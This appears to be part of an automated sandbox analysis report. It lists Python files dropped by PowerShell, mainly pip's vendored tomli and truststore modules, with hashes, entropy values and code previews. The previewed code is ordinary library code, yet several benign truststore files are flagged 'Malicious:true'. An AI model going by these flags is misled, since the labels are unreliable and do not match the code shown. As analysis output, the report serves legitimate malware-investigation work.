                                                                                                                                                                                                                              Entropy (8bit):4.67342712908563
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:e71Y6S2ekJKFeaft8j97n2pxPTq+tcTngIrHv8vMuUQZBj4iwkk8:eJY6SNkJKFnl8j9vwEgIrHEvMuU+Bj4Q
                                                                                                                                                                                                                              MD5:F67CD21BFA4C3AFF92F17E6D06373CCC
                                                                                                                                                                                                                              SHA1:C21682D8065B4C6319654107C4D1691000551A96
                                                                                                                                                                                                                              SHA-256:83DF8435A00B4BE07C768918A42BB35056A55A5A20ED3F922183232D9496AED3
                                                                                                                                                                                                                              SHA-512:37EFE1A5E34AA9F8A7D09588DC9C5BA1F86AF035DCA297A375F0D0485F9ED14DCFECF0EF47B3B6817639A813B0E37BA78B140728342FF66D2BB7E899A3F52A9E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# SPDX-License-Identifier: MIT.# SPDX-FileCopyrightText: 2021 Taneli Hukkinen.# Licensed to PSF under a Contributor Agreement...from __future__ import annotations..from collections.abc import Iterable.import string.from types import MappingProxyType.from typing import Any, BinaryIO, NamedTuple..from ._re import (. RE_DATETIME,. RE_LOCALTIME,. RE_NUMBER,. match_to_datetime,. match_to_localtime,. match_to_number,.).from ._types import Key, ParseFloat, Pos..ASCII_CTRL = frozenset(chr(i) for i in range(32)) | frozenset(chr(127))..# Neither of these sets include quotation mark or backslash. They are.# currently handled as separate cases in the parser functions..ILLEGAL_BASIC_STR_CHARS = ASCII_CTRL - frozenset("\t").ILLEGAL_MULTILINE_BASIC_STR_CHARS = ASCII_CTRL - frozenset("\t\n")..ILLEGAL_LITERAL_STR_CHARS = ILLEGAL_BASIC_STR_CHARS.ILLEGAL_MULTILINE_LITERAL_STR_CHARS = ILLEGAL_MULTILINE_BASIC_STR_CHARS..ILLEGAL_COMMENT_CHARS = ILLEGAL_BASIC_STR_CHARS..TOML_WS = frozenset(
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2943
                                                                                                                                                                                                                              Entropy (8bit):4.97581664014055
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:8qJnOFJmPEwYUvke+Sq/RAHtvtTcP3dCmUdtVHDo7fXWq4NcPEY:fowfvke3AMtVqcz6IcPt
                                                                                                                                                                                                                              MD5:0111DF35A25A503E0247F50838D35AEA
                                                                                                                                                                                                                              SHA1:41D8D0205AE11DA5308581E62DF6DA123BE415ED
                                                                                                                                                                                                                              SHA-256:75B8E0E428594F6DCA6BDCFD0C73977DDB52A4FC147DD80C5E78FC34EA25CBEC
                                                                                                                                                                                                                              SHA-512:CD58581A287C723F687CDB08646EF7453CCAB59E73145F1367119D6BEB61DFDCC6F97C6186112D849E37FD31EB6750EC20BEF3795E57729A0306E537D9216907
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# SPDX-License-Identifier: MIT.# SPDX-FileCopyrightText: 2021 Taneli Hukkinen.# Licensed to PSF under a Contributor Agreement...from __future__ import annotations..from datetime import date, datetime, time, timedelta, timezone, tzinfo.from functools import lru_cache.import re.from typing import Any..from ._types import ParseFloat..# E.g..# - 00:32:00.999999.# - 00:32:00._TIME_RE_STR = r"([01][0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])(?:\.([0-9]{1,6})[0-9]*)?"..RE_NUMBER = re.compile(. r""".0.(?:. x[0-9A-Fa-f](?:_?[0-9A-Fa-f])* # hex. |. b[01](?:_?[01])* # bin. |. o[0-7](?:_?[0-7])* # oct.).|.[+-]?(?:0|[1-9](?:_?[0-9])*) # dec, integer part.(?P<floatpart>. (?:\.[0-9](?:_?[0-9])*)? # optional fractional part. (?:[eE][+-]?[0-9](?:_?[0-9])*)? # optional exponent part.).""",. flags=re.VERBOSE,.).RE_LOCALTIME = re.compile(_TIME_RE_STR).RE_DATETIME = re.compile(. rf""".([0-9]{{4}})-(0[1-9]|1[0-2])-(0[1-9]|[12][0-9]|3[
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):254
                                                                                                                                                                                                                              Entropy (8bit):4.976783622352379
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SAgLRatxp89TQSnGDEYBFpkoL+RBZuCw+mkILmt:5O+xp89TQSnGDEYBpnLyILmt
                                                                                                                                                                                                                              MD5:19A32B713392E66BAC544E73F025B2CB
                                                                                                                                                                                                                              SHA1:6DC6337D888EDEA5138A094E517BE6C0E4BD09F4
                                                                                                                                                                                                                              SHA-256:F864C6D9552A929C7032ACE654EE05EF26CA75D21B027B801D77E65907138B74
                                                                                                                                                                                                                              SHA-512:C3D610738DC0E26F5645C200C6D1BD121642C5C2E71A2A235A702C2F5902E5CBE641016B6B79B1947E327B92216DEDB40947D4247BB8913B138BE0A440C0C28A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# SPDX-License-Identifier: MIT.# SPDX-FileCopyrightText: 2021 Taneli Hukkinen.# Licensed to PSF under a Contributor Agreement...from typing import Any, Callable, Tuple..# Type annotations.ParseFloat = Callable[[str], Any].Key = Tuple[str, ...].Pos = int.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                                                                              Entropy (8bit):3.8402655651949273
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SZeW0FOo2:SZeRFH2
                                                                                                                                                                                                                              MD5:BD2FA011A5E69D2B68DF68FBC59F8BE6
                                                                                                                                                                                                                              SHA1:C6EB45191EAFD8DEAC33DAD1803B14305F841347
                                                                                                                                                                                                                              SHA-256:F0F8F2675695A10A5156FB7BD66BAFBAAE6A13E8D315990AF862C792175E6E67
                                                                                                                                                                                                                              SHA-512:BF00CC5B6AB5B5819D2DEB374F3AA6A25C5ED4D9372B4FB90C5605DD0E90528C914BFBAAFC499940EB301AEBFA8E05503D9282FA3DA7CED86C14017040BA8019
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Marker file for PEP 561.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):403
                                                                                                                                                                                                                              Entropy (8bit):4.846007460250602
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:LD7xWmWfRTkZdps+2Q4QXGxNFAFmwMjXzgZRTWWcmiDFr/9RW8VqRJ2wLXmWW2U3:P7QmqRA1i5CAN6Fmw64T7ip9R+RJdL23
                                                                                                                                                                                                                              MD5:290D58AD70AB50D7305A4C82AA657AAD
                                                                                                                                                                                                                              SHA1:3F5A80198421EDB70F29334CAE4FA4202DD7B1BD
                                                                                                                                                                                                                              SHA-256:AB34CB487F0FBC0918D5FAFA410DAF57E2B013F33CDF0757BA0B6925A3FF01B3
                                                                                                                                                                                                                              SHA-512:9730D76A407EE57516A5EC48AECFF98CEA043D8C916FBE77985A9729C4EF3BBF29A833EC7AF38DE4703EC2C1600B42A0C48C7BA80CF5D5C7D65519DA2B9E3597
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""Verify certificates using native system trust stores"""..import sys as _sys..if _sys.version_info < (3, 10):. raise ImportError("truststore requires Python 3.10 or later")..from ._api import SSLContext, extract_from_ssl, inject_into_ssl # noqa: E402..del _api, _sys # type: ignore[name-defined] # noqa: F821..__all__ = ["SSLContext", "inject_into_ssl", "extract_from_ssl"].__version__ = "0.8.0".
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):602
                                                                                                                                                                                                                              Entropy (8bit):5.493432040331146
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:qCSB/P0OZiYx7QmqRoZ2LRFmw6tqHaaqjWplJ4BNet8KNnaeijaZuaoL+t:ZYMWiluZ+ww6EH5Celv6KNn1BZupLS
                                                                                                                                                                                                                              MD5:AF423FF993EDCE7D3B006109198780AA
                                                                                                                                                                                                                              SHA1:C9ED205D5C6AD8717ADFDC3548E002DBE5DE636B
                                                                                                                                                                                                                              SHA-256:3B94CB2712778EB2B59A030C487370CD51CBF813A1D0942AAE79D0F7F55933F2
                                                                                                                                                                                                                              SHA-512:8D6A3560FBEB4C6F280F712E9F1CFDD8C759A51348F65053D0A3667CE27296B208D49AA3BB17EAE256BDA70A42117AEF8C4A2433199D69CB7E59CF850B577526
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................b.....d.Z.d.d.l.Z.e.j...................d.k...r...e.d...........d.d.l.m.Z.m.Z.m.Z...[.[.g.d...Z.d.Z.y.).z4Verify certificates using native system trust stores.....N)...........z(truststore requires Python 3.10 or later.....)...SSLContext..extract_from_ssl..inject_into_ssl).r....r....r....z.0.8.0)...__doc__..sys.._sys..version_info..ImportError.._apir....r....r......__all__..__version__........PC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/truststore/__init__.py..<module>r........s:..........:.............w........@..A..A..?..?....$..?.......r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15781
                                                                                                                                                                                                                              Entropy (8bit):4.997876802655286
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:xtTaxMwitH3TgKKmnA9lPAI+0FVBnokaVHTu:dwitH38KKmnA9lPAI+0LBUVzu
                                                                                                                                                                                                                              MD5:8F188FEC02C51940D6089F8C3D93316C
                                                                                                                                                                                                                              SHA1:8F9E9A90CC2E38DF7A27376DBA30F7F9DDE6DDD5
                                                                                                                                                                                                                              SHA-256:7046BF0F2D1B593C531F814EDD58D3137C8CB5FCD29D4633286324256EB988B7
                                                                                                                                                                                                                              SHA-512:205DAFE3A8311F6BBF554A5D32463C0DCEFCD3D4791A23DCDDB39DA5932B5245CCDC1FE3239E8FA73AF9433ABF197B07BAF1E997610545BDE3E077ED7CF310D3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.&..............................U.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.....e.j...........................d.k(..r.d.d.l.m.Z.m.Z...n%..e.j...........................d.k(..r.d.d.l.m.Z.m.Z...n.d.d.l.m.Z.m.Z...e.j"..................r.d.d.l.m.Z...e.e.z...e.j,..................e.....z...e.j,..................e.....z...Z.e.j0..................e.d.<...e.e.z...e.j4..................g.e.e.z...f.....z...Z.e.j0..................e.d.<...d.d...Z.d.d...Z...G.d...d.e.........Z.d.e.j>..................e.j@..................z...d.e.d.z...d.d.f.d...Z!y.)......N.....)..._original_SSLContext.._original_super_SSLContext.#_truststore_SSLContext_dunder_class."_truststore_SSLContext_super_class..Windows)..._configure_context.._verify_peercerts_impl..Darwin)...Buffer.._StrOrBytesPath.._PasswordType..returnc..........................t.........t.........d.t.....................d.d.l.m.c...m.c...m.c...m.}...t.........|.d.t...................y.#.t.........$.r...Y.y.w.x.Y
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16646
                                                                                                                                                                                                                              Entropy (8bit):5.278098594399685
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:uSDitL4brAjualletqV88Cj+gsw1LAqfj:vitLQMjJlx7t/ej
                                                                                                                                                                                                                              MD5:DD6815A56AC7693C946F30F8272907F7
                                                                                                                                                                                                                              SHA1:89B8E9A33BF5E86DF9301E482AC7C8DD8022FCD3
                                                                                                                                                                                                                              SHA-256:AD12DE2A1A1D0E736545645673F294B3312A2E749AC46DFFA9465E032D7BECFB
                                                                                                                                                                                                                              SHA-512:AF3A9868A0CE71FB5F4AE663D292212065A6E2C7C05F3F3CFAAB89A1F9F1105F58F46B13C29591C19E4C08D73DB88BF319AEA2E3C63D6A8822514D2D327B108F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.E..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j$..........................d.....Z...e...e.e.e.j/..................d.........................Z.e.d.k...r...e.d.e.d.......d.e.d...................d.e.d.e.d.e.f.d...Z...e.d.d.........Z...e.d.d.........Z.e.Z.e.Z.e.Z e.Z!e.Z"e.Z#e.Z$e.Z%e.Z&e.Z'..e.e&........Z(e.Z)e.Z*..e.e%........Z+..e.e!........Z,..e.e"........Z-..e.e#........Z...e.e$........Z/e.Z0e.Z1..e.e.........Z2..e.e.........Z3..e.e.........Z4e.Z5e.Z6..e)e,g.e.jn.................._8........e2e.jn.................._9........e2g.e.jt.................._8........e,e.jt.................._9........e*e.g.e.jv.................._8........e-e.jv.................._9........e4e.g.e.jx.................._8........e*e.jx.................._9........e4e.g.e.jz.................._8........e*e.jz.................._9........e4..e.e5........g.e.j|.................._8........e*e.j|..................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2199
                                                                                                                                                                                                                              Entropy (8bit):5.241652055248746
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:M224f5Vn4LkZyPmG+DyfQFdaCGrrZSkMMLQ/:MD4hVNZChfQDaXZ1W
                                                                                                                                                                                                                              MD5:56DD599AA23C0BCF187556E0DB2C3B29
                                                                                                                                                                                                                              SHA1:B2FE329544525A6D67C2B1F81233E56EFE8D881D
                                                                                                                                                                                                                              SHA-256:3831B2C5AF0BA1EFDD533CCD0BE69D78BAA6304564B7014E3BCF06F427E4853F
                                                                                                                                                                                                                              SHA-512:AB3E5B3857CF578EFB07E13534E352BD91755A33BB6A508C5007E136F8C56E342661A234CA723A8B2095D00151B2CB8DCF17A12348F7F17EF9B461A3C96DF644
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z...e.j...................d.........Z.e.j...................d.e.j...................d.e.j...................d.....f.d...........Z.d.e.d.e.f.d...Z...d.d.e.j...................d.e.e.....d.e.d.z...d.d.f.d...Z.y.)......N).z./etc/ssl/cert.pemz./etc/pki/tls/cert.pemz"/etc/ssl/certs/ca-certificates.crtz./etc/ssl/ca-bundle.pemz.^[0-9a-fA-F]{8}\.[0-9]$..ctx..returnc................#....4...K.....t.........j...........................}.|.j...................s!|.j...................r&t.........|.j...........................r.|.j.............................n>t.........D.]5..}.t.........j...................j...................|.........s..#|.j...................|...............n...d.......y...w.).N)...cafile)...ssl..get_default_verify_pathsr......capath.._capath_contains_certs..set_default_verify_paths.._CA_FILE_CANDIDATES..os..path..isfile..load_verify_locations).r......defaultsr....s.... .PC:\Users\xbov\D
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1083
                                                                                                                                                                                                                              Entropy (8bit):5.15287849397767
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:iybpVlSUqdaKwSnLtysTwKNn1ghEaYSs2XuitypLRDYquQZ:iybUUqbnZy46GpkuQ8YquQZ
                                                                                                                                                                                                                              MD5:ECEC25B5B86F4B7A0C61CEEC51E3D051
                                                                                                                                                                                                                              SHA1:CAE2D11F9D2F518A0B340B9BDEDC9CE04668D5AC
                                                                                                                                                                                                                              SHA-256:A4E7C8ECAFEC20FDF136A382D86D07DF9CCF80EA0B33B131C0ED0C2731D76812
                                                                                                                                                                                                                              SHA-512:5E2D577E29A709020FAD1BB906C5CC55AA7D8BBB26126B8BED563E00F3ECD5A5713407FB8AE388FA1398C646C2E1770FA8089710D3108C02ECD3D4C5718EC1E6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vfj...............................U.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j...................Z...e.e.e.........Z.e.j...................e.....e.d.<...e.e.d.<...e.j...................j...................d.k(..r.e.Z.d.Z.n.e.Z.e.Z.d.e.j...................d.e.j...................d.d.f.d...Z.y.)......N.#_truststore_SSLContext_dunder_class."_truststore_SSLContext_super_class..cpython..ssl_context..verify_mode..returnc.....................D.....t.........j...................j...................|.|...........y.).N)..._original_super_SSLContextr......__set__).r....r....s.... .VC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/truststore/_ssl_constants.py.._set_ssl_context_verify_moder........s.............*..*..2..2.;....L.....)...ssl..sys..typing..SSLContext.._original_SSLContext..superr......Optional..type..__annotations__..implementation..namer....r......object..VerifyModer......r....r......<module>r........s........................~.~.....".#7.9M..N......&,._._.T.%:..:...%)..(.......
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15490
                                                                                                                                                                                                                              Entropy (8bit):5.695621577683938
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:J+GT6WQ7ukGNmxUC1iaSIG+I8HxRiKWhKtnc1:4GT6FmmlIaSIG+I8H3i1Ktnc1
                                                                                                                                                                                                                              MD5:A80FED3D78A96AC5F6D7B56E26B875FA
                                                                                                                                                                                                                              SHA1:E681A67B9631A552C8593E8A7FCA9622158B9AB9
                                                                                                                                                                                                                              SHA-256:CCEE14FCBFF283119C91DFE18D90B2FC9DA9E773A441066972BC0BBE453D1155
                                                                                                                                                                                                                              SHA-512:72EDBA05DDD40177F3DD6D5A885849F88B65AA0B0D157906FF1ADDF1865AB8BF3C253F06B1360E3BF18681506499509FA40E35ED32570F472929A3D1F8A731BA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf<D........................".....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.Z.e.Z e.Z!..G.d...d.e.........Z"..e.e"........Z#..e.e#........Z$..G.d...d.e.........Z%..e.e%........Z&..G.d...d.e.........Z'..G.d...d.e.........Z(e.r.e.e(....Z)n...e.e(........Z)..G.d...d.e.........Z*..G.d...d.e.........Z+..e.e+........Z,..G.d...d.e.........Z-..e.e-........Z...G.d...d.e.........Z/..e.e/........Z0..e.e0........Z1..G.d...d.e.........Z2..G.d...d.e.........Z3..e.e3........Z4..G.d...d.e.........Z5..e.e5........Z6..G.d...d e.........Z7..e.e7........Z8..e.e.........Z9d.Z:d!Z;d"Z<d#Z=d.Z>..e.d$........Z?d%Z@d&ZAd'ZBd(ZCd)ZDd*ZEd+ZFd,ZGd-ZHd.ZId/ZJd#ZKd0ZLd1ZMd2ZNeBeCz...eDz...eEz...eFz...eGz...eHz...eIz...eJz...ZO..e.d3........ZP..e.d4........ZQd5eRd6e.d7e.d8e.f.d9..ZSePj...................ZTe8e9f.eT_U........eSeT_V........ePj...................ZWe.e.e!e.e.f.eW_U
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9893
                                                                                                                                                                                                                              Entropy (8bit):4.635903723254797
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:HcfiUp+8taSmnHxASGVh+TyjiyLsw3sRR3UGdOv3V2EaS70A7AG6paDMQdMHYuB9:HmiUBOnRAph+TqGd1tB9
                                                                                                                                                                                                                              MD5:1507E4A2A7C645A6BE519C6EFB4DAAE5
                                                                                                                                                                                                                              SHA1:10F72C38FB17105CD18B1A65742047951153981E
                                                                                                                                                                                                                              SHA-256:C63B84BBFAE51F885C7494D1388984C8E12A770F85F2DE6F3B61F6053A18D11A
                                                                                                                                                                                                                              SHA-512:389C3DB863D2B9DC02EB4481E29E24009BB63A944720324083F488FF60093102E6AD0796649480F86A85D066EDD1A4DD5DFAA5ED71D487A7840CA63020D101CA
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import os.import platform.import socket.import ssl.import typing..import _ssl # type: ignore[import]..from ._ssl_constants import (. _original_SSLContext,. _original_super_SSLContext,. _truststore_SSLContext_dunder_class,. _truststore_SSLContext_super_class,.)..if platform.system() == "Windows":. from ._windows import _configure_context, _verify_peercerts_impl.elif platform.system() == "Darwin":. from ._macos import _configure_context, _verify_peercerts_impl.else:. from ._openssl import _configure_context, _verify_peercerts_impl..if typing.TYPE_CHECKING:. from pip._vendor.typing_extensions import Buffer..# From typeshed/stdlib/ssl.pyi._StrOrBytesPath: typing.TypeAlias = str | bytes | os.PathLike[str] | os.PathLike[bytes]._PasswordType: typing.TypeAlias = str | bytes | typing.Callable[[], str | bytes]...def inject_into_ssl() -> None:. """Injects the :class:`truststore.SSLContext` into the ``ssl``. module by replacing :class:`ssl.SSLContext`.. """. se
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):17694
                                                                                                                                                                                                                              Entropy (8bit):4.685981615314351
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:afeBProOg/cIMcEPj/8gEQ4u5XniN3ewg6lXPjI75Ivx:HBTZg/cIMcEPw+R8ewgwE9E
                                                                                                                                                                                                                              MD5:9FB67A46EC0CDCEADC7E7A09234569D3
                                                                                                                                                                                                                              SHA1:7FF4450A82A21DB280713CA3C4CD44C36CD78166
                                                                                                                                                                                                                              SHA-256:063BC02A80235E17483EEC69635DB81C9205B300DBD29ABC0E3CA7CC9395C2A7
                                                                                                                                                                                                                              SHA-512:EACB25A88EDCE383EABE434934B9DF1F172F215A9AB71B0F73C4F5B20CCA1132121BC777BCE2DCFA2576DEC6CFA3A72B651B53D114A8B9B0E39F0F45F1691E2A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import contextlib.import ctypes.import platform.import ssl.import typing.from ctypes import (. CDLL,. POINTER,. c_bool,. c_char_p,. c_int32,. c_long,. c_uint32,. c_ulong,. c_void_p,.).from ctypes.util import find_library..from ._ssl_constants import _set_ssl_context_verify_mode.._mac_version = platform.mac_ver()[0]._mac_version_info = tuple(map(int, _mac_version.split("."))).if _mac_version_info < (10, 8):. raise ImportError(. f"Only OS X 10.8 and newer are supported, not {_mac_version_info[0]}.{_mac_version_info[1]}". )...def _load_cdll(name: str, macos10_16_path: str) -> CDLL:. """Loads a CDLL by name, falling back to known path on 10.16+""". try:. # Big Sur is technically 11 but we use 10.16 due to the Big Sur. # beta being labeled as 10.16.. path: str | None. if _mac_version_info >= (10, 16):. path = macos10_16_path. else:. path = find_library(name). if not path:.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2324
                                                                                                                                                                                                                              Entropy (8bit):4.8682850551010795
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:IrOqRx8/smPtt4f0Ptt4q2OFp8moyfhmfxUecJcWXz2XGq:IrO7BPwMPwqToyfqxNWSWq
                                                                                                                                                                                                                              MD5:303AD55F035B88677390F0EC61192477
                                                                                                                                                                                                                              SHA1:180FC796B1F30F0C2B9F7C7DA870A67485CF7479
                                                                                                                                                                                                                              SHA-256:2CB519ED919A8A8FA2E5DA4A2A328249E4AE7E69FA4FCA62F650DC167BD2CAAD
                                                                                                                                                                                                                              SHA-512:7AC126F2E30345018342D2257B3319C798C50B2387B7CD3C3B86B9D91B896BD1E35D1B5A4CAC918E7E6A86C5E55CC3763A100644C51B6E9B454B118A4E4DA85A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import contextlib.import os.import re.import ssl.import typing..# candidates based on https://github.com/tiran/certifi-system-store by Christian Heimes._CA_FILE_CANDIDATES = [. # Alpine, Arch, Fedora 34+, OpenWRT, RHEL 9+, BSD. "/etc/ssl/cert.pem",. # Fedora <= 34, RHEL <= 9, CentOS <= 9. "/etc/pki/tls/cert.pem",. # Debian, Ubuntu (requires ca-certificates). "/etc/ssl/certs/ca-certificates.crt",. # SUSE. "/etc/ssl/ca-bundle.pem",.].._HASHED_CERT_FILENAME_RE = re.compile(r"^[0-9a-fA-F]{8}\.[0-9]$")...@contextlib.contextmanager.def _configure_context(ctx: ssl.SSLContext) -> typing.Iterator[None]:. # First, check whether the default locations from OpenSSL. # seem like they will give us a usable set of CA certs.. # ssl.get_default_verify_paths already takes care of:. # - getting cafile from either the SSL_CERT_FILE env var. # or the path configured when OpenSSL was compiled,. # and verifying that that path exists. # - getting capath from eit
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1130
                                                                                                                                                                                                                              Entropy (8bit):4.693580140193211
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:GvkQNwX/ojjvtyQ9eyYJMinoSdqiQtSw4SwgeMdwlSeIA4tty5Hu:4k1gXVy7yFAki6Rdy5O
                                                                                                                                                                                                                              MD5:6B6AFD01F3F9A225FE7A4366B3E04570
                                                                                                                                                                                                                              SHA1:339DAE582F9B73F50EED269B6E7A3C4AB4125A0F
                                                                                                                                                                                                                              SHA-256:3540F87D529D483D36AE2EFE75BD2D9CED15A8B3FD687BB3992B5C5BBB40974F
                                                                                                                                                                                                                              SHA-512:5B76B0996684B0032E66489C8A4B66F44B5266FEB1520858FD547569A3F83E2EFABE4A5D91523DF0552FA49C4664E702B43D8CE6759B9B2F547FAE4C1FD7AF19
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import ssl.import sys.import typing..# Hold on to the original class so we can create it consistently.# even if we inject our own SSLContext into the ssl module.._original_SSLContext = ssl.SSLContext._original_super_SSLContext = super(_original_SSLContext, _original_SSLContext)..# CPython is known to be good, but non-CPython implementations.# may implement SSLContext differently so to be safe we don't.# subclass the SSLContext...# This is returned by truststore.SSLContext.__class__()._truststore_SSLContext_dunder_class: typing.Optional[type]..# This value is the superclass of truststore.SSLContext.._truststore_SSLContext_super_class: type..if sys.implementation.name == "cpython":. _truststore_SSLContext_super_class = _original_SSLContext. _truststore_SSLContext_dunder_class = None.else:. _truststore_SSLContext_super_class = object. _truststore_SSLContext_dunder_class = _original_SSLContext...def _set_ssl_context_verify_mode(. ssl_context: ssl.SSLContext, verify_mode: ssl
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):17468
                                                                                                                                                                                                                              Entropy (8bit):4.997861377505689
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:9CF1Pf5Y1Y5fwzfJ4I1zMjBrPirimePsmZBzkI7E5nLSTGILr1Q:Q1JtK94/+5ePsQR7E5nLSTGIXK
                                                                                                                                                                                                                              MD5:8FC28DB14065412E0AEFEB643B5E0014
                                                                                                                                                                                                                              SHA1:1BC35371EA741C9C580D8EF54E9FFF9AC89661A0
                                                                                                                                                                                                                              SHA-256:D71FC485139E27D40AD6C3008DF9D90BB6B0608F149C12582FE4E30025182380
                                                                                                                                                                                                                              SHA-512:40B1F167AE042CCA622799ABF6C7C2C4EC6149B1A2870FFC4DA15CC199D5101370A887EFD3C5D24D2FAB3F00961998FFE02A7EF9BB74620502C3BBAF840612CA
                                                                                                                                                                                                                              Malicious:true
